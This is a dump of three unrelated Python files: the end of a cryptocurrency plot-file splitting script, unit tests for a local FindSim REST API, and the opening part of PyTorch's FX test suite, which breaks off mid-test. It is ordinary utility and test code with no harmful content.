Remove old files after successfull merge.") print("-d = Dry run.") print("-t = Truncate plot file instead of splitting it.") print("-s = Destination size.") print(BRIGHTGREEN + "If OUTDIR is missing then the optimized plot is written to the same directory " "as the source plot.") sys.exit(1) # Read arguments outDirName = None bTruncate = False bRemoveOld = False bDryRun = False inPathName = None inSize = 0 splitNonces = None for arg in sys.argv[1:]: if arg == "-r": bRemoveOld = True continue if arg == "-t": bTruncate = True continue if arg == "-d": bDryRun = True continue if arg == "-o": outDirName = arg continue if outDirName == "-o": if not os.path.exists(arg): print(BRIGHTRED + f"Error: Output directory does not exist!" + RESET_ALL) sys.exit(1) outDirName = arg continue if arg == "-s": splitNonces = arg continue if splitNonces == "-s": for c, m in ( ( "k", 1024 ), ( "m", MB ), ( "g", 1024 * MB ), ( "t", MB * MB ) ): if arg.endswith(c) or arg.endswith(c.upper()): splitNonces = max(int(arg[:-1]) * m // NONCE_SIZE, 1) break else: splitNonces = int(arg) continue if not os.path.exists(arg): continue fileName = os.path.basename(arg) if "." in fileName or (fileName.count("_") != 3): continue try : key, startNonce, nonces, stagger = [ int(x) for x in fileName.split("_") ] inSize = os.path.getsize(arg) if nonces * NONCE_SIZE != inSize : print(BRIGHTRED + f"Error: Source file has invalid size! Expected {nonces * NONCE_SIZE} but file has {inSize}!" + RESET_ALL) sys.exit(1) inPathName = arg except Exception as exc : print(BRIGHTRED + f"Warning: Ignoring invalid source filename: {exc}" + RESET_ALL) sys.exit(1) if inPathName is None or not os.path.exists(inPathName): print(BRIGHTRED + f"Error: Source plot file is missing!" + RESET_ALL) sys.exit(1) if splitNonces >= nonces: print(BRIGHTRED + f"Error: Source plot file is smaller than split size!" + RESET_ALL) sys.exit(1) if outDirName in ( None, "-o" ): outDirName = os.path.dirname(inPathName) outFiles = [] curNonce = startNonce remNonces = nonces while remNonces > 0: outPathName = os.path.join(outDirName, f"{key}_{curNonce}_{splitNonces}_{splitNonces}") outFiles.append([ outPathName, None, curNonce, splitNonces, splitNonces * NONCE_SIZE ]) curNonce += splitNonces remNonces -= splitNonces if remNonces < splitNonces: splitNonces = remNonces if bTruncate and len(outFiles): continue if os.path.exists(outPathName): print(BRIGHTRED + f"Warning: Destination file {outPathName} already exists! Removing it!" + RESET_ALL) if not bDryRun: os.remove(outPathName) if diskFree(outDirName) <= os.path.getsize(inPathName): print(BRIGHTRED + "Error: Not enough free space on disk for merged plot file!" + RESET_ALL) sys.exit(1) bStop = False if not bDryRun: buf = deque() sem = Semaphore(1000) lock = _thread.allocate_lock() thrReader = Thread(target = readerThread, args = ( buf, sem, lock ), daemon = True) thrReader.start() for nr, outFile in enumerate(outFiles): if bTruncate and nr: continue outPathName, _, startNonce, splitNonces, outSize = outFile print(f"Destination file(s) {outPathName} will have:") print(f" Nonces: {splitNonces}") print(f" File size: {outSize // 1024 // MB} GB") outFiles[nr][1] = open(outPathName, "wb") if bDryRun: sys.exit(0) t0 = time.time() curOutFileNr = 0 O = outFiles[0][1] blockSize = outFiles[0][3] * SCOOP_SIZE cnt = written = lastWritten = 0 t1 = time.time() while thrReader.is_alive() or buf: try: data = buf.popleft() if data is None: break dataLen = len(data) if dataLen <= blockSize: if not O is None: O.write(data) blockSize -= dataLen else: if not O is None: O.write(data[:blockSize]) blockSize -= dataLen while blockSize <= 0: curOutFileNr = (curOutFileNr + 1) % len(outFiles) O = outFiles[curOutFileNr][1] newBlockSize = outFiles[curOutFileNr][3] * SCOOP_SIZE if (blockSize < 0) and not O is None: O.write(data[blockSize:dataLen + blockSize + newBlockSize]) blockSize += newBlockSize sem.release() cnt += 1 written += dataLen if cnt >= 1000: t2 = time.time() print("%.1f%% written. %d MB/s. " % (100 * written / inSize, (written - lastWritten) // MB / (t2 - t1)), end = "\r") cnt = 0 lastWritten = written t1 = t2 except KeyboardInterrupt: bStop = True buf.clear() except: lock.acquire() for outFile in outFiles: if not outFile[1] and None: outFile[1].close() if bStop: print(BRIGHTRED + "\nCancelled by user") sys.exit(1) if bRemoveOld: print(BRIGHTBLUE + "Removing old plot file...") try: os.remove(inPathName) except Exception as exc: # Windows can be a big pile of shit in some situations. One of them is the file locking... print(BRIGHTRED + f"Error: Failed removing plot file {inPathName}:\n{exc}" + RESET_ALL) print(BRIGHTGREEN + f"Finished after {int(time.time() - t0)} seconds.")
test.py
import unittest import os import subprocess import signal import multiprocessing import time import requests import argparse TSV_ZIP_PATH = 'test_files/test_opt.zip' MODEL_DIR = 'test_files/model/' TSV_DIR = 'test_files/tsv/' URL_BASE = 'http://127.0.0.1:8000/' OUTPUTRES = False OUTPUTJSN = False def http_request_optimization(n_p, trl, tsv_zip_path, model_path): # 1.Set url and data: # url url = URL_BASE + 'tasks/Optimization/' # data data = { "username": "unittest", "num_processes": n_p, "tolerance": trl } # files files = { 'tsv_files': open(tsv_zip_path, 'rb'), 'model_file': open(model_path, 'rb') } # 2. Send REST request, get response response = requests.post(url, files=files, data=data) return response def http_request_calculation(tsv_path, model_path): # 1.Set url and data: # url url = URL_BASE + 'tasks/Calculation/' # data data = { "username": "unittest", } # files files = { 'tsv_file': open(tsv_path, 'rb'), 'model_file': open(model_path, 'rb') } # 2. Send REST request, get response response = requests.post(url, files=files, data=data) return response class TestEnv(unittest.TestCase): def test_findsim(self): ''' Test FindSim exists ''' path_parent = os.path.abspath('..') path_findsim = os.path.join( path_parent,'REST_FindSim/third_party/FindSim/findSim.py') path_optimization = os.path.join( path_parent,'REST_FindSim/third_party/FindSim/multi_param_minimization.py') self.assertTrue(os.path.isfile(path_findsim)) self.assertTrue(os.path.isfile(path_optimization)) class TestAPIs(unittest.TestCase): def handle_response(self,r): if OUTPUTRES: print(r) if OUTPUTJSN: print(r.json()) self.assertEqual('', r.json()['error']) ''' BarChart: bc_ratio_sb8.tsv synSynth7.g DirectParameter: dp_Kd_tau.tsv synSynth7.g dp.tsv synSynth7.g DoseResponse: dr_j2c.tsv synSynth7.g dr_ratio_b2c.tsv synSynth7.g TimeSeries: iclamp_hh13.tsv loadhh.py ts_j4d.tsv synSynth7.g ts_norm_m3b.tsv synSynth7.g ts_ratio_t2a.tsv synSynth7.g vclamp_hh.tsv loadhh.py ''' def test_calculation_DP(self): """ Test calculation. Type: DirectParameter """ # dp_Kd_tau.tsv tsv = os.path.join(TSV_DIR, 'dp_Kd_tau.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) # dp.tsv tsv = os.path.join(TSV_DIR, 'dp.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) def test_calculation_BC(self): """ Test calculation. Type: BarChart """ # bc_ratio_sb8.tsv tsv = os.path.join(TSV_DIR, 'bc_ratio_sb8.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) def test_calculation_TS(self): """ Test calculation. Type: TimeSeries """ # iclamp_hh13.tsv tsv = os.path.join(TSV_DIR, 'iclamp_hh13.tsv') model = os.path.join(MODEL_DIR, 'loadhh.py') r = http_request_calculation(tsv,model) self.handle_response(r) # vclamp_hh.tsv tsv = os.path.join(TSV_DIR, 'vclamp_hh.tsv') model = os.path.join(MODEL_DIR, 'loadhh.py') r = http_request_calculation(tsv,model) self.handle_response(r) # ts_j4d.tsv tsv = os.path.join(TSV_DIR, 'ts_j4d.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) # ts_norm_m3b.tsv tsv = os.path.join(TSV_DIR, 'ts_norm_m3b.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) # ts_ratio_t2a.tsv tsv = os.path.join(TSV_DIR, 'ts_ratio_t2a.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) def test_calculation_DR(self): """ Test calculation. Type: DoseResponse """ # dr_j2c.tsv tsv = os.path.join(TSV_DIR, 'dr_j2c.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) # dr_ratio_b2c.tsv tsv = os.path.join(TSV_DIR, 'dr_ratio_b2c.tsv') model = os.path.join(MODEL_DIR, 'synSynth7.g') r = http_request_calculation(tsv,model) self.handle_response(r) def test_optimization_multi_process(self): """ Test optimization request: single process """ tsvs = TSV_ZIP_PATH model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g') r = http_request_optimization(6, 0.6, tsvs, model) self.handle_response(r) def test_optimization(self): """ Test optimization request: multi processes """ tsvs = TSV_ZIP_PATH model = os.path.join(MODEL_DIR, 'Gs_To_PKA_31_May_2019.g') r = http_request_optimization(1, 0.8, tsvs, model) self.handle_response(r) def launch_API_server(): path_parent = os.path.abspath('..') path_APIs = os.path.join(path_parent, 'REST_FindSim/manage.py') command = 'python ' + path_APIs + ' runserver' p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT) p.wait() def main(): parser = argparse.ArgumentParser() # All parser.add_argument( '-a', '--All', action="store_true", help='Run all test cases.') # Optimization parser.add_argument( '-op', '--Optimization', action="store_true", help='Run optimization test cases.') # Calculation parser.add_argument( '-bc', '--BarChart', action="store_true", help='Run BarChart test cases.') parser.add_argument( '-dp', '--DirectParameter', action="store_true", help='Run DirectParameter test cases.') parser.add_argument( '-dr', '--DoseResponse', action="store_true", help='Run DoseResponse test cases.') parser.add_argument( '-ts', '--TimeSeries', action="store_true", help='Run TimeSeries test cases.') # Output parser.add_argument( '-or', '--OutputResponse', action="store_true", help='Output http response status when testing.') parser.add_argument( '-oj', '--OutputJson', action="store_true", help='Output http response content when testing.') parser.add_argument( '-v', '--Verbosity', type = int, default = 2, help='Set verbosity of unittest, default=2') args = parser.parse_args() global OUTPUTRES global OUTPUTJSN if args.OutputResponse: OUTPUTRES = True if args.OutputJson: OUTPUTJSN = True # TODO(Chen): Try to start server inside the test.py # 1.Launch server: ''' print("---Launching server...") p_server = multiprocessing.Process(target =launch_API_server, args = ()) p_server.start() ''' # 2.Running tests: print("---Running tests...") suite = unittest.TestSuite() if args.All : tests = [TestEnv("test_findsim"), # APIs' tests here TestAPIs("test_calculation_BC"), TestAPIs("test_calculation_DP"), TestAPIs("test_calculation_DR"), TestAPIs("test_calculation_TS"), TestAPIs("test_optimization"), TestAPIs("test_optimization_multi_process")] else: tests = [TestEnv("test_findsim")] if args.Optimization: tests.append(TestAPIs("test_optimization")) tests.append(TestAPIs("test_optimization_multi_process")) if args.BarChart: tests.append(TestAPIs("test_calculation_BC")) if args.DirectParameter: tests.append(TestAPIs("test_calculation_DP")) if args.DoseResponse: tests.append(TestAPIs("test_calculation_DR")) if args.TimeSeries: tests.append(TestAPIs("test_calculation_TS")) suite.addTests(tests) runner = unittest.TextTestRunner(verbosity=args.Verbosity) res = runner.run(suite) ''' # 3.Terminate server print("---Terminating server...") os.killpg(os.getpgid(p_server.pid), signal.SIGTERM) # p_server.kill() print("---Finished.") ''' if __name__ == '__main__': main()
test_fx.py
# Owner(s): ["oncall: fx"] import builtins import contextlib import copy import functools import inspect import math import numbers import operator import os import pickle import sys import torch import traceback import typing import types import warnings import unittest from math import sqrt from torch.multiprocessing import Process from torch.testing import FileCheck from torch.testing._internal.common_methods_invocations import op_db from torch.testing._internal.common_device_type import ops, onlyCPU, instantiate_device_type_tests import torch.utils._pytree as pytree import torch.fx._pytree as fx_pytree from torch.fx import symbolic_trace, Proxy, Node, GraphModule, Interpreter, Tracer, Transformer, Graph, wrap, PH from torch.fx.node import Target, Argument from torch.fx.passes import shape_prop from torch.fx.immutable_collections import immutable_dict, immutable_list from torch.fx.experimental.rewriter import RewritingTracer from torch.fx.operator_schemas import get_signature_for_torch_op from copy import deepcopy from collections import namedtuple from torch.fx.proxy import TraceError from torch.fx._compatibility import _BACK_COMPAT_OBJECTS, _MARKED_WITH_COMATIBLITY from fx.test_subgraph_rewriter import TestSubgraphRewriter # noqa: F401 from fx.test_dce_pass import TestDCE # noqa: F401 from fx.test_fx_const_fold import TestConstFold # noqa: F401 from fx.test_fx_param_shape_control_flow import TestConstParamShapeInControlFlow # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import AnnotationsTest # noqa: F401 if sys.version_info >= (3, 7): from fx.test_gradual_type import TypeCheckerTest # noqa: F401 from typing import Any, Callable, Dict, NamedTuple, List, Optional, Tuple, Union from torch.testing._internal.common_utils import ( IS_FBCODE, IS_MACOS, IS_WINDOWS, TEST_WITH_ROCM, find_library_location, run_tests, ) from torch.testing._internal.jit_utils import JitTestCase from fx.named_tup import MyNamedTup try: from torchvision import models as torchvision_models HAS_TORCHVISION = True except ImportError: HAS_TORCHVISION = False skipIfNoTorchVision = unittest.skipIf(not HAS_TORCHVISION, "no torchvision") class SimpleTest(torch.nn.Module): def forward(self, x): return torch.relu(x + 3.0) def a_non_torch_leaf(a, b): return a + b # Used for test_autowrap_function. Autowrapped functions need to be global def fx_int(x: float) -> int: return int(x) def fx_int_x2(x: float) -> int: return int(x) * 2 # used in test_pytree. It's all the way out here because pickling a GraphModule # that uses Point errors out if Point is local to the function Point = namedtuple('Point', ['x', 'y']) # Test wrap() passing both a function name as well as a function # directly def a_lifted_leaf(a, b): return a[0] + a[1] + b wrap('a_lifted_leaf') # Test wrapping twice doesn't break anything wrap('a_lifted_leaf') def a_lifted_leaf2(a, b): return a[0] + a[1] + b wrap(a_lifted_leaf2) wrap('len') wrap('getattr') @wrap def wrapped_via_decorator(a): return a + 1 wrap('wrapped_with_submodule') def wrapped_with_submodule(x: torch.Tensor, batchnorm1d: torch.nn.BatchNorm1d): return batchnorm1d(x) real_wrapped_via_decorator = wrapped_via_decorator real_a_lifed_leaf = a_lifted_leaf real_a_lifed_leaf2 = a_lifted_leaf2 _sqrt = sqrt wrap('wrapper_fn') def wrapper_fn(x): return torch.foo(x) class Pair(NamedTuple): x : torch.Tensor y : torch.Tensor # for testing pytrees class Foo(object): # noqa: B209 def __init__(self, a, b): self.a = a self.b = b class TestFX(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True if not (TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS): lib_file_path = find_library_location('libtorchbind_test.so') torch.ops.load_library(str(lib_file_path)) def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def checkGraphModule(self, m: torch.nn.Module, args, kwargs=None): """Check that an nn.Module's results match the GraphModule version for a given set of args/kwargs. """ kwargs = kwargs if kwargs else {} ref_outs = m(*args, **kwargs) gm = symbolic_trace(m) gm.graph.lint() test_outs = gm(*args, **kwargs) self.assertEqual(ref_outs, test_outs) def test_graph_module(self): class MySub(torch.nn.Module): def __init__(self): super().__init__() self.w = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.w + x class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.lin = torch.nn.Linear(4, 3) self.sub_mod = MySub() self.w = torch.nn.Parameter(torch.rand(3)) def forward(self, A, B, c): t = torch.sigmoid(A) + self.lin(c) return self.sub_mod(t.data + self.w + t + 1 - A + B // A + -A + A.add(B, alpha=3)) m = MyModule() gm = symbolic_trace(m) ms = torch.jit.script(gm) class M2(torch.nn.Module): def forward(self, A): m, idx = torch.max(A, 0) return m + 1, idx + 1 m2 = M2() gm2 = symbolic_trace(m2) class T(torch.nn.Module): def forward(self, A, b=4, *args, c=5, **kwargs): x = A + 1 + args[0] + kwargs['3'] return x t = T() symbolic_trace(t) # test for issue described at https://github.com/pytorch/pytorch/issues/63883 class M3(torch.nn.Module): def forward(self, x): return torch.relu(x) m3 = M3() gm3 = symbolic_trace(m3) new_instance = gm3.__new__(type(gm3)) new_instance.__init__(gm3, gm3.graph) x = torch.randn(5, 3) torch.testing.assert_allclose(new_instance(x), torch.relu(x)) def test_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) x, y = torch.rand(1), torch.rand(1) self.assertEqual(torch.sin(x + y), gm(x, y)) def test_args_kwargs(self): class T(torch.nn.Module): def forward(self, *args, **kwargs): x = args[0] + kwargs['foo'] return x t = T() self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_args_kwargs_no_self(self): class T(torch.nn.Module): def forward(*args, **kwargs): # noqa: B902 self = args[0] return torch.relu(args[1]) t = T() with self.assertRaisesRegex(RuntimeError, r'cannot be part of \*args expansion'): self.checkGraphModule(t, (torch.rand(1), torch.rand(1)), {'foo': torch.rand(1)}) def test_fx_shifts(self): class MyModule(torch.nn.Module): def forward(self, x): return x << 3, x >> 3 input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_fx_and_or(self): class MyModule(torch.nn.Module): def forward(self, x): return x & x, x | x input = torch.LongTensor(10).random_(0, 1024) m = MyModule() self.checkGraphModule(m, (input,)) def test_dict(self): class MyDictMod(torch.nn.Module): def forward(self, d): return d['3'].relu(), {'4' : d['3'].neg()} input_dict = {'3': torch.rand(3, 4)} m = MyDictMod() self.checkGraphModule(m, (input_dict,)) def test_matmul_tracing(self): const = torch.randn(3) def matmul_f(x): return x @ const mod = symbolic_trace(matmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), matmul_f(inp)) def rmatmul_f(x): return const @ x mod = symbolic_trace(rmatmul_f) inp = torch.randn(3) self.assertEqual(mod(inp), rmatmul_f(inp)) def test_disallow_override(self): # Custom delegate to disallow in-place tensor operations class NoMutableCallTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: name = target if isinstance(target, str) else torch.typename(target) if name[-1] == '_': raise RuntimeError('In-place operations are not supported') return super().create_node(kind, target, args, kwargs, name) # Test method class MyInplaceMod(torch.nn.Module): def forward(self, x): x.add_(3.0) return x m = MyInplaceMod() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m) # Test free function class MyInplaceMod2(torch.nn.Module): def forward(self, x): torch.log_(x) return x m2 = MyInplaceMod2() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m2) # Test symbolic node as an arg class MyInplaceMod3(torch.nn.Module): def forward(self, x): y = torch.ones(3, 4) y.add_(x) return x m3 = MyInplaceMod3() with self.assertRaisesRegex(RuntimeError, 'In-place operations'): NoMutableCallTracer().trace(m3) def test_leaf_module(self): # Custom delegate to make it so that there are no leaf modules, everything # should get traced through class NoLeafModulesTracer(Tracer): def is_leaf_module(self, m, qualname): return False class MyReluMod(torch.nn.Module): def __init__(self): super().__init__() self.relu = torch.nn.ReLU() def forward(self, x): return self.relu(x) mrm = MyReluMod() sym = NoLeafModulesTracer().trace(mrm) for node in sym.nodes: self.assertNotEqual(node.op, 'call_module') sym.lint() def test_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) m = symbolic_trace(to_trace) self.assertIn('a_lifted_leaf2', m.code) self.assertEqual(27, m(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_wrapped_via_decorator(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(m).transform() self.assertIn('wrapped_via_decorator', transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) m = symbolic_trace(M()) self.assertIn("wrapped_with_submodule", m.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), m(input)) def test_wrapped_retrace(self): def to_trace(y): return wrapped_via_decorator(y) m = symbolic_trace(to_trace) self.assertIn('wrapped_via_decorator', m.code) self.assertEqual(m(0), 1) retraced = symbolic_trace(m) self.assertIn('wrapped_via_decorator', retraced.code) self.assertEqual(retraced(0), 1) def test_graph_edit_with_proxy(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) gm.graph.lint() self.assertEqual(gm(3, 4), 14) def test_graph_unique_names(self): class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = symbolic_trace(m).graph new_g = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_val = new_g.graph_copy(g, val_map) t = Proxy(output_val) # test that we can use proxy objects to generate more graph code later for things that do not need to work with modules. new_g.output((t + t).node) gm = GraphModule(m, new_g) seen_names : Set[str] = set() for node in gm.graph.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_stack_traces(self): class M(torch.nn.Module): def forward(self, a, b): return a + b tracer = torch.fx.Tracer() tracer.record_stack_traces = True graph = tracer.trace(M()) # saving the original list because we will insert new nodes as a part of a test orig_graph_nodes = list(graph.nodes) for node in orig_graph_nodes: if node.op == 'output': continue self.assertTrue(node.stack_trace is not None) assert 'test_fx.py' in node.stack_trace # verify that copying the node does not lose the stack trace new_node = graph.node_copy(node) self.assertTrue(new_node.stack_trace is not None) assert 'test_fx.py' in new_node.stack_trace def test_graph_unique_names_manual(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'linear_mod', args=(a,), name='foo_1_1') c : torch.fx.Node = graph.create_node('get_attr', 'y_attr', name='foo_1') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) graph2 = torch.fx.Graph() val_map : Dict[Node, Node] = {} graph2.graph_copy(graph, val_map) seen_names : Set[str] = set() for node in graph2.nodes: assert node.name not in seen_names seen_names.add(node.name) def test_unpack(self): class M(torch.nn.Module): def forward(self, a, b): c, d = a return c + d + b a = (torch.rand(1), torch.rand(1)) b = torch.rand(1) m = M() self.checkGraphModule(m, (a, b)) def test_native_callable(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: raise unittest.SkipTest("non-portable load_library call used in test") # This test exercises the case where we use FX to translate from Python # code to some native callable object # # For the purposes of testing, we use ElementwiseInterpreter defined # in test_custom_class.cpp. # # We test that we can # 1) Construct a native callable from FX IR # 2) Construct a drop-in replacement module that delegates to the # native callable rather than the original code # 3) Run both the original code and native callable wrapper with # equivalent results # 4) TorchScript compile the native callable wrapper and confirm # equivalent results with the reference # 5) TorchScript serialize and deserialize the native callable # and confirm equivalent results with the reference # We use this simple Module as a reference computation class MySimpleMod(torch.nn.Module): def forward(self, x): return 3.0 * x + x msm = MySimpleMod() # This is what a lowering pass might look like: a function that takes # a valid nn.Module, symbolically traces it, lowers the Module to some # representation, and wraps that representation up into another # nn.Module instance that handles dispatch to the compiled/lowered code. def lower_to_elementwise_interpreter(orig_mod : torch.nn.Module) -> torch.nn.Module: # ===== Stage 1: Symbolic trace the module ===== mod = symbolic_trace(orig_mod) # ===== Stage 2: Lower GraphModule representation to the C++ # interpreter's instruction format ====== instructions = [] constant_idx = 0 constants = {} fn_input_names = [] target_to_name = { operator.add : "add", operator.mul : "mul" } output_node : Optional[Node] = None # For each instruction, create a triple # (instruction_name : str, inputs : List[str], output : str) # to feed into the C++ interpreter for n in mod.graph.nodes: target, args, out_name = n.target, n.args, n.name assert len(n.kwargs) == 0, "kwargs currently not supported" if n.op == 'placeholder': # Placeholders specify function argument names. Save these # for later when we generate the wrapper GraphModule fn_input_names.append(target) elif n.op == 'call_function': assert target in target_to_name, "Unsupported call target " + target arg_names = [] for arg in args: if not isinstance(arg, Node): # Pull out constants. These constants will later be # fed to the interpreter C++ object via add_constant() arg_name = f'constant_{constant_idx}' constants[arg_name] = torch.tensor( [arg] if isinstance(arg, numbers.Number) else arg) arg_names.append(arg_name) constant_idx += 1 else: arg_names.append(arg.name) instructions.append((target_to_name[target], arg_names, out_name)) elif n.op == 'output': if output_node is not None: raise RuntimeError('Multiple output nodes!') output_node = n else: raise RuntimeError('Unsupported opcode ' + n.op) interpreter = torch.classes._TorchScriptTesting._ElementwiseInterpreter() # Load constants for k, v in constants.items(): interpreter.add_constant(k, v) # Specify names for positional input arguments interpreter.set_input_names(fn_input_names) # Load instructions interpreter.set_instructions(instructions) # Specify name for single output assert isinstance(output_node.args[0], torch.fx.Node) interpreter.set_output_name(output_node.args[0].name) # ===== Stage 3: Create a wrapper GraphModule around the interpreter ===== class WrapperModule(torch.nn.Module): def __init__(self, interpreter): super().__init__() self.interpreter = interpreter wrapper = WrapperModule(interpreter) # Create a graph that: 1) Takes function arguments 2) Invokes the interpreter # 3) Returns the speficied return value # FIXME: The following code could be greatly simplified by symbolic_trace'ing # the wrapper with a Tracer that considers the Wrapper instance a root # module, however, I can't get `__call__` exposed on TorchBind classes # without it messing up Python `hasattr` for some reason. More digging # into CPython's implementation of hasattr is probably in order... graph = torch.fx.Graph() # Add placeholders for fn inputs placeholder_nodes = [] for name in fn_input_names: placeholder_nodes.append(graph.create_node('placeholder', name)) # Get the interpreter object interpreter_node = graph.create_node('get_attr', 'interpreter') # Add a node to call the interpreter instance output_node = graph.create_node( op='call_method', target='__call__', args=(interpreter_node, placeholder_nodes)) # Register output graph.output(output_node) graph.lint() # Return final GraphModule!!! return GraphModule(wrapper, graph) # Lower GraphModule to C++ interpreter lowered = lower_to_elementwise_interpreter(msm) # Compare correctness with original module x = torch.rand(3, 4) ref_out = msm(x) test_out = lowered(x) torch.testing.assert_close(test_out, ref_out) # Test TorchScript compilation scripted_lowered = torch.jit.script(lowered) script_out = scripted_lowered(x) torch.testing.assert_close(script_out, ref_out) # Test TorchScript ser/de import_copy = self.getExportImportCopy(scripted_lowered) imported_out = import_copy(x) torch.testing.assert_close(imported_out, ref_out) def test_reserved_getattr(self): """Ensure that we do not name any nodes with a reserved builtin like `getattr`""" class M(torch.nn.Module): def forward(self, a): return a.foo.bar.baz m = M() m_g = symbolic_trace(m) m_g.graph.lint() for node in m_g.graph.nodes: self.assertTrue(node.name != "getattr") def test_node_tagging(self): class TaggingTracer(Tracer): def create_node(self, kind : str, target : Union[str, Callable], args : Tuple[Argument, ...], kwargs : Dict[str, Any], name : Optional[str] = None, type_expr : Optional[Any] = None) -> Node: n = super().create_node(kind, target, args, kwargs, name) n.tag = 'foo' return n class M(torch.nn.Module): def forward(self, a, b): return a + b m = M() g = TaggingTracer().trace(m) g.lint() for n in g.nodes: self.assertTrue(hasattr(n, 'tag')) self.assertEqual(n.tag, 'foo') def test_tensor_attribute(self): class TensorAttribute(torch.nn.Module): def __init__(self): super().__init__() self.tensor = torch.rand(3, 4) def forward(self, x): return torch.nn.functional.linear(x, self.tensor) ta = TensorAttribute() traced = symbolic_trace(ta) traced(torch.rand(4, 4)) class WrapperForQualname(torch.nn.Module): def __init__(self): super().__init__() self.ta = TensorAttribute() def forward(self, x): return torch.nn.functional.linear(x, self.ta.tensor) wfq = WrapperForQualname() traced2 = symbolic_trace(wfq) traced2.graph.lint() traced2(torch.rand(4, 4)) def test_tensor_attribute_coalseced(self): def count_attrs(fx_module): targets = set() for node in traced.graph.nodes: if node.op == 'get_attr': targets.add(node.target) return len(targets) val = torch.tensor(5) def f(x): return x + val + val traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 1) val2 = torch.tensor(5) def f(x): val = torch.tensor(5) return x + val + val2 traced = symbolic_trace(f) traced.graph.lint() self.assertEqual(count_attrs(traced), 2) def test_symbolic_trace_sequential(self): class Simple(torch.nn.Module): def forward(self, x): return torch.neg(x) seq = torch.nn.Sequential( Simple(), Simple(), Simple() ) traced = symbolic_trace(seq) traced.graph.lint() x = torch.rand(3, 4) self.assertEqual(traced(x), seq(x)) def test_tensor_constant(self): class ConstTensor(torch.nn.Module): def forward(self, x): return torch.nn.functional.linear(x, torch.zeros(3, 